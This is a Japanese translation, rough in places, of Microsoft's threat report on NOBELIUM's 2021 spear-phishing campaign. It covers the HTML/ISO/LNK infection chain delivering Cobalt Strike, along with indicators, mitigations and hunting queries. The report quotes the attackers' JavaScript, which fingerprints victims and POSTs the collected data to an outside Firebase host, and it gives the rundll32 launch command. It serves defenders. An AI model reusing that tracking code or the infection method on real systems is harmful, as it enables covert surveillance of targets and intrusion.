NOBELIUM による新しい巧妙な電子メールベースの攻撃

Microsoft Threat Intelligence Center (MSTIC) は、SolarWinds、 SUNBURST バックドアTEARDROP マルウェアGoldMax マルウェア、およびその他の関連コンポーネントに対する攻撃の背後にいる脅威アクターである NOBELIUM によって運営されている大規模な悪意のある電子メール キャンペーンを明らかにしました。 2021 年 1 月から Microsoft によって最初に観察および追跡されたこのキャンペーンは、重要な実験を示す一連の波を経て進化しました。 2021 年 5 月 25 日、NOBELIUM が合法的な大量メール サービスであるConstant Contactを利用して、米国を拠点とする開発組織になりすまし、悪意のある URL をさまざまな組織や業界に配布したため、キャンペーンはエスカレートしました。

マイクロソフトは、業界がこの最新の活動を理解し、保護するのに役立つように、 NOBELIUM が運用しているこの洗練された電子メールベースのキャンペーンに関して、この警告と新しいセキュリティ調査を発行しています。以下に、攻撃者の動機、悪意のある行動、およびこの攻撃から保護するためのベスト プラクティスについて概説します。 Microsoft On The Issues ブログでも詳細を確認できます。

注: これはアクティブなインシデントです。利用可能になり次第、ここに詳細を掲載します。

更新 [2021 年 5 月 28 日] : 独自の感染チェーンで利用される 4 つのツールで構成されるNOBELIUM の最新の初期段階のツールセット(EnvyScout、BoomBox、NativeZone、および VaporRage) について詳しく説明する新しいブログ投稿を公開しました。

NOBELIUM はこれまで、政府機関、非政府組織 (NGO)、シンクタンク、軍隊、IT サービス プロバイダー、医療技術と研究、通信プロバイダーを標的にしてきました。この最新の攻撃で、NOBELIUM は 150 以上の組織にまたがる約 3,000 の個人アカウントを標的にしようと試みました。標的ごとに固有のインフラストラクチャとツールを使用するという確立されたパターンを採用し、より長期間検出されずにいる能力を高めました。

この新しい大規模な電子メール キャンペーンは、正当なサービスである Constant Contact を利用して、電子メール サービスの URL の背後に隠されている悪意のあるリンクを送信します (多くの電子メールおよびドキュメント サービスは、ファイルの共有を簡素化するメカニズムを提供し、誰がいつリンクをクリックしたかについての洞察を提供します。 )。このキャンペーンでは大量の電子メールが配信されたため、自動化された電子メール脅威検出システムによって悪意のある電子メールのほとんどがブロックされ、スパムとしてマークされました。ただし、一部の自動化された脅威検出システムは、構成とポリシーの設定により、または検出が行われる前に、以前の電子メールの一部を受信者に正常に配信した可能性があります。

Microsoft 365 Defenderは、この脅威に対して調整された防御を提供します。 Microsoft Defender for Office 365は悪意のある電子メールを検出し、 Microsoft Defender for Endpointはマルウェアと悪意のある動作を検出します。このキャンペーンは動きが速く、範囲が広く認識されているため、Microsoft は組織に対して、このレポートに記載されている通信の特徴に一致するものを調査および監視し、この記事で以下に説明するアクションを実行することをお勧めします。

国家が支援する巧妙な攻撃が引き続き増加しており、継続的な脅威の調査とお客様を保護するための取り組みの一環として、これらの複数の脅威に対してセキュリティを確保し、対応する方法について、セキュリティ コミュニティにガイダンスを提供し続けます。・次元攻撃。

スピア フィッシング キャンペーンが NOBELIUM ペイロードを配信

MSTIC が観測し、このブログで詳述されている NOBELIUM キャンペーンは、SolarWinds Orion プラットフォームの侵害を含む、2019 年 9 月から 2021 年 1 月まで実行された NOBELIUM オペレーションとは大きく異なります。これらの観察結果は、攻撃者の商売の変化と、以前の事件の広範な開示に続く実験の可能性を表している可能性があります。

初期のテストと初期の発見

2 月のキャンペーンの最初の発見の一環として、MSTIC は、Google Firebase プラットフォームを利用して悪意のあるコンテンツを含む ISO ファイルをステージングし、このプラットフォームを利用して URL にアクセスした人の属性を記録するフィッシング メールの波を特定しました。 MSTIC は、このキャンペーンの開始を 2021 年 1 月 28 日まで追跡しました。この時点で、攻撃者は、メールの追跡部分のみを送信し、Firebase URL を利用してクリックしたターゲットを記録することで、初期の偵察を行っていたようです。この初期の活動では、悪意のあるペイロードの配信は観察されませんでした。

進化する配信技術

キャンペーンの次の展開で、MSTIC は NOBELIUM がスピア フィッシング メールに添付された HTML ファイルを介してシステムを侵害しようとしているのを観察しました。標的のユーザーが開くと、HTML 内の JavaScript が ISO ファイルをディスクに書き込み、ターゲットにそのファイルを開くよう促した結果、ISO ファイルが外部またはネットワーク ドライブのようにマウントされました。ここから、ショートカット ファイル (LNK) が付随する DLL を実行し、その結果、システム上で Cobalt Strike Beacon が実行されます。

例 HMTL/ISO 感染チェーンの流れ。

図 1. HMTL/ISO 感染チェーンのフローの例。

Firebase を利用したターゲット フィンガープリンティング コードの例を次に示します。

try {
let sdfgfghj = '';
let kjhyui = new XMLHttpRequest();
kjhyui.open('GET', 'https://api.ipify.org/?format=jsonp?callback=?', false);
kjhyui.onreadystatechange = function (){
sdfgfghj = this.responseText;
}
kjhyui.send(null);
let ioiolertsfsd = navigator.userAgent;
let uyio = window.location.pathname.replace('/','');
var ctryur = {'io':ioiolertsfsd,'tu':uyio,'sd':sdfgfghj};
ctryur = JSON.stringify(ctryur);
let sdfghfgh = new XMLHttpRequest();
sdfghfgh.open('POST', 'https://eventbrite-com-default-rtdb.firebaseio.com/root.json', false);
sdfghfgh.setRequestHeader('Content-Type', 'application/json');
sdfghfgh.send(ctryur);
} catch (e) {}

同様のスピア フィッシング キャンペーンが 3 月を通して検出されました。これには、NOBELIUM 攻撃者が意図したターゲットに基づいて付随する HTML ドキュメントにいくつかの変更を加えることが含まれていました。 MSTIC はまた、攻撃者が Firebase から ISO を削除し、代わりにそれを HTML ドキュメント内にエンコードする実験を行っていることも確認しました。同様に、攻撃者は、RTF 内にエンコードされた悪意のある Cobalt Strike Beacon DLL を使用して、RTF ドキュメントを含む ISO に HTML ドキュメントをリダイレクトする実験を行いました。実験の最後の例では、フィッシング メールに HTML が添付されておらず、代わりに URL が、ISO の配布元である標的の組織を偽装する独立した Web サイトにつながっていました。

フィッシング メッセージと配信方法だけが、キャンペーンの進化要因ではありませんでした。より標的を絞ったウェーブの 1 つでは、ISO ペイロードは配信されませんでしたが、ユーザーがリンクをクリックした後、攻撃者が制御する Web サーバーによってターゲット デバイスの追加のプロファイリングが実行されました。標的となったデバイスが Apple iOS デバイスの場合、ユーザーは NOBELIUM の制御下にある別のサーバーにリダイレクトされ、そこで CVE-2021-1879 のパッチ以降にパッチが適用されたゼロデイ エクスプロイトが提供されました。

エスカレートされたターゲティングと配信

実験はキャンペーンの大部分を通じて継続されましたが、2021 年 4 月にエスカレートし始めました。4 月の波の間に、攻撃者は Firebase の使用を放棄し、専用 URL を使用してユーザーを追跡しなくなりました。彼らの技術は、HTML ドキュメント内で ISO をエンコードするように移行し、 api.ipify.orgサービスを使用してリモート サーバーにターゲット ホストの詳細を格納する役割を果たします。攻撃者は、意図しない環境を識別した場合に悪意のあるプロセスの実行を停止する、特定の内部 Active Directory ドメインのチェックを使用することがありました。

2021 年 5 月、攻撃者は HTML と ISO の組み合わせを維持することで再度手法を変更しましたが、TrojanDownloader:MSIL/BoomBox として検出されるカスタム .NET 第 1 段階の埋め込みを投下し、ホストベースの偵察データを報告し、追加のペイロードをダウンロードしました。から、Dropbox クラウド ストレージ プラットフォーム。

5 月 25 日、NOBELIUM キャンペーンは大幅にエスカレートしました。正規の大量メール サービスである Constant Contact を使用して、NOBELIUM は 150 を超える組織の約 3,000 の個人アカウントを標的にしようとしました。大規模なキャンペーンのため、自動化されたシステムがほとんどの電子メールをブロックし、スパムとしてマークしました。ただし、自動化されたシステムにより、以前の電子メールの一部が受信者に正常に配信された可能性があります。

5 月 25 日のキャンペーンでは、いくつかの反復が行われました。一例では、電子メールは USAID <ashainfo@usaid.gov>から送信されたように見えますが、標準の Constant Contact サービスと一致する本物の送信者の電子メール アドレスを持っています。このアドレス (受信者ごとに異なります) は@in.constantcontact.comで終わり、(受信者ごとに異なります)、返信先アドレス < mhillary@usaid.gov>が観察されました。以下に示すように、電子メールは USAID からの警告を装っています。

メールのスクリーンショットの例。

図 2. メールのスクリーンショットの例。

ユーザーが電子メールのリンクをクリックすると、URL は次のパターンに従う正規の Constant Contact サービスにユーザーを誘導します。

https://r20.rs6[.]net/tn.jsp?f=

次に、ユーザーは NOBELIUM が制御するインフラストラクチャにリダイレクトされ、URL は次のパターンに従います。

https://usaid.theyardservice[.]com/d/<target_email_address>

その後、悪意のある ISO ファイルがシステムに配信されます。この ISO ファイル内には、 %USER% AppDataLocalTemp<ランダムなフォルダー名>パスに保存されている次のファイルがあります。

  • カスタムの Cobalt Strike Beacon ローダーを実行するReports.lnkなどのショートカット
  • ターゲットに表示されるica-declass.pdfなどのおとりドキュメント
  • Microsoft によって NativeZone と呼ばれるカスタム Cobalt Strike Beacon ローダーであるDocument.dllなどの DLL

内部に「Documents.dll」が隠されている ISO ファイルの内容。

図 3. ISO ファイルの内容。 「Documents.dll」は隠しファイルであることに注意してください。

隠しDLLファイルを実行するショートカット。

図 4. 隠し DLL ファイルを実行するショートカット。

LNK ファイルをデトネーションすると、最終的に「C:Windowssystem32rundll32.exe Documents.dll,Open」が実行されます。

これらのペイロードの展開に成功すると、NOBELIUM は侵害されたシステムへの永続的なアクセスを実現できます。次に、これらの悪意のあるペイロードの実行に成功すると、NOBELIUM は横方向の移動、データの流出、追加のマルウェアの配信などのアクション オンの目標を実行できるようになります。

5 月 25 日に発生したキャンペーンの侵害の痕跡 (IOC) は、セキュリティ チームが攻撃者の活動を特定するのに役立つように、このブログで提供されています。

マイクロソフトのセキュリティ研究者は、NOBELIUM のスピア フィッシング操作が繰り返されており、その頻度と範囲が拡大していると評価しています。進化する一連の戦術を使用して、グループによって追加の活動が実行される可能性があることが予想されます。

Microsoft は、この攻撃者の進化する活動を引き続き監視し、必要に応じて更新します。 Microsoft 365 Defenderは、悪意のある電子メール、添付ファイル、接続、マルウェア ペイロード、その他の悪意のあるアーティファクト、攻撃者の行動など、この脅威の複数のコンポーネントからお客様を保護します。特定の検出名とアラートについては、以下の検出の詳細を参照してください。さらに、顧客は防御ガイダンスに従い、高度なハンティングを活用して、アクター アクティビティの亜種を軽減する必要があります。

緩和策

これらの緩和策を適用して、この脅威の影響を軽減してください。監視対象の軽減策の展開ステータスについては、推奨事項カードを確認してください。

  • Microsoft Defender ウイルス対策またはウイルス対策製品の同等の製品でクラウド配信の保護を有効にして、急速に進化する攻撃者のツールと手法に対応します。クラウドベースの機械学習保護により、新しい未知の亜種の大部分がブロックされます。
  • Microsoft 以外のウイルス対策が脅威を検出しない場合や、Microsoft Defender ウイルス対策がパッシブ モードで実行されている場合でも、Microsoft Defender for Endpoint が悪意のあるアーティファクトをブロックできるように、ブロック モードで EDR を実行します。 (ブロック モードの EDR はバックグラウンドで動作し、侵害後に検出された悪意のあるアーティファクトを修正します。)
  • ネットワーク保護を有効にして、アプリケーションやユーザーがインターネット上の悪意のあるドメインやその他の悪意のあるコンテンツにアクセスするのを防ぎます。
  • 完全に自動化されたモードで調査と修復を有効にして、Microsoft Defender for Endpoint がアラートに対して即座にアクションを実行して違反を解決し、アラートの量を大幅に削減できるようにします。
  • デバイス検出を使用して、ネットワーク上の管理されていないデバイスを見つけて Microsoft Defender for Endpoint にオンボードすることで、ネットワークの可視性を高めます。
  • 多要素認証 (MFA) を有効にして、侵害された資格情報を軽減します。 Microsoft は、すべてのお客様が Microsoft Authenticator などのパスワードレス ソリューションをダウンロードして使用し、アカウントを保護することを強くお勧めします。
  • Office 365 ユーザーについては、 多要素認証のサポートを参照してください。
  • コンシューマーおよび個人のメール アカウントについては、 2 段階認証の使用方法 を参照してください。
  • この脅威に関連するアクティビティをブロックまたは監査するには、次の攻撃面削減ルールを有効にします:すべての Office アプリケーションが子プロセスを作成するのをブロックします。注: 導入前にルールの影響を評価してください。

侵害の痕跡 (IOC)

この攻撃はまだアクティブであるため、これらの指標は、この観察されたアクティビティを網羅しているとは見なされません。これらの侵害の兆候は、2021 年 5 月 25 日に開始された大規模なキャンペーンからのものです。

インジケータ タイプ 説明
ashainfo@usaid.gov Eメール なりすましメール アカウント
mhillary@usaid.gov Eメール なりすましメール アカウント
2523f94bd4fba4af76f4411fe61084a7e7d80dec163c9ccba9226c80b8b31252 SHA-256 悪意のある ISO ファイル (コンテナ)
d035d394a82ae1e44b25e273f99eae8e2369da828d6b6fdb95076fd3eb5de142 SHA-256 悪意のある ISO ファイル (コンテナ)
94786066a64c0eb260a28a2959fcd31d63d175ade8b05ae682d3f6f9b2a5a916 SHA-256 悪意のある ISO ファイル (コンテナ)
48b5fb3fa3ea67c2bc0086c41ec755c39d748a7100d71b81f618e82bf1c479f0 SHA-256 悪意のあるショートカット (LNK)
ee44c0692fd2ab2f01d17ca4b58ca6c7f79388cbc681f885bb17ec946514088c SHA-256 Cobalt Strike Beacon マルウェア
ee42ddacbd202008bcc1312e548e1d9ac670dd3d86c999606a3a01d464a2a330 SHA-256 Cobalt Strike Beacon マルウェア
usaid.theyardservice[.]com ドメイン ISO ファイルの配布に使用されるサブドメイン
ワールドホームアウトレット[.]com ドメイン Cobalt Strike C2 のサブドメイン
dataplane.theyardservice[.]com ドメイン Cobalt Strike C2 のサブドメイン
cdn.theyardservice[.]com ドメイン Cobalt Strike C2 のサブドメイン
static.theyardservice[.]com ドメイン Cobalt Strike C2 のサブドメイン
192[.]99[.]221[.]77 IPアドレス worldhomeoutlet[.]comによって解決された IP
83[.]171[.]237[.]173 IPアドレス * theyardservice[.]comによって解決されたIP
theyardservice[.]com ドメイン アクターが制御するドメイン

検出の詳細

ウイルス対策

Microsoft Defender ウイルス対策は、脅威コンポーネントを次のマルウェアとして検出します。

エンドポイントの検出と応答 (EDR)

セキュリティ センターの次のタイトルのアラートは、ネットワークでの脅威の活動を示している可能性があります。

  • NOBELIUM が使用する悪意のある ISO ファイル
  • NOBELIUMが使用するCobalt Strike Beacon
  • NOBELIUM が使用する Cobalt Strike ネットワーク インフラストラクチャ

次のアラートも、この脅威に関連する脅威の活動を示している可能性があります。ただし、これらのアラートは無関係の脅威アクティビティによってトリガーされる可能性があり、このレポートで提供されるステータス カードでは監視されません。

  • 珍しいファイルが作成され、スタートアップ フォルダーに追加されました。
  • 異常な特性を持つリンク ファイル (LNK) が開かれました。

高度な狩猟

Microsoft 365 ディフェンダー

注:次のサンプル クエリでは、1 週間分のイベントを検索できます。最大 30 日分の生データを探索してネットワーク内のイベントを調査し、NOBELIUM 大量メールに関連する可能性のある 1 週間以上の指標を特定するには、[高度なハンティング] ページ > [クエリ] タブに移動し、カレンダーのドロップダウン メニューを選択して、過去 30 日間を検索するようにクエリを更新します。

悪用の可能性があるアクティビティを特定するには、Microsoft 365 セキュリティ センターで次のクエリを実行します。

NOBELIUM による電子メール データ内の USAID 固定連絡先リソースの悪用

元の Constant Contact 送信インフラストラクチャから発信された組織への最近の電子メール、特にこのレポートで詳述されているキャンペーンでアカウントがなりすましまたは侵害された組織からの電子メールを探します。 Microsoft 365 セキュリティ センターでクエリを実行します。

EmailUrlInfo
| where UrlDomain == "r20.rs6.net"
| join kind=inner EmailEvents on $left.NetworkMessageId==$right.NetworkMessageId
| where SenderMailFromDomain == "in.constantcontact.com"
| where SenderFromDomain == "usaid.gov"

常時連絡サービスの悪用に使われる NOBELIUM の件名

元の Constant Contact 送信インフラストラクチャから発信された組織への最近の電子メール、特にこのレポートで詳述されているキャンペーンでアカウントがなりすましまたは侵害された組織からの電子メールを探します。また、「Special Alert!」という用語を使用して、5 月下旬にフィッシング キャンペーンで見られた電子メールの件名キーワードも指定しています。主題でさまざまな方法で。 Microsoft 365 セキュリティ センターでクエリを実行します。

let SubjectTerms = pack_array ("Special","Alert");
EmailUrlInfo
| where UrlDomain == "r20.rs6.net"
| join kind=inner EmailEvents on $left.NetworkMessageId==$right.NetworkMessageId
| where SenderMailFromDomain == "in.constantcontact.com"
| where SenderFromDomain == "usaid.gov"
| where Subject has_any (SubjectTerms)

アズールセンチネル

Azure Sentinel を使用した NOBELIUM エクスプロイト検索

Azure Sentinel を使用してエクスプロイト アクティビティの可能性を特定するために、お客様は、このGitHub リポジトリでこれらのインジケーターを含む Sentinel クエリを見つけることができます。

MITRE ATT&CK テクニックの観察

この脅威は、 MITRE ATT&CK フレームワークで文書化されている攻撃者の手法を利用します。

初期アクセス

実行

  • T1610 Deploy Container — ペイロードは、ターゲット コンピューターにマウントされた ISO ファイルを介して配信されます。
  • T1204.001 User Execution: Malicious Link — Cobalt Strike Beacon ペイロードは悪意のあるリンク (LNK) ファイルを介して実行されます。

コマンドと制御

もっと詳しく知る

Microsoft セキュリティ ソリューションの詳細については、当社の Web サイト を参照してくださいセキュリティ ブログをブックマークして、セキュリティに関する専門家の記事を入手してください。また、 @MSFTSecurityをフォローして、サイバーセキュリティに関する最新ニュースと更新情報を入手してください。

参考: https ://www.microsoft.com/en-us/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/

コメント

タイトルとURLをコピーしました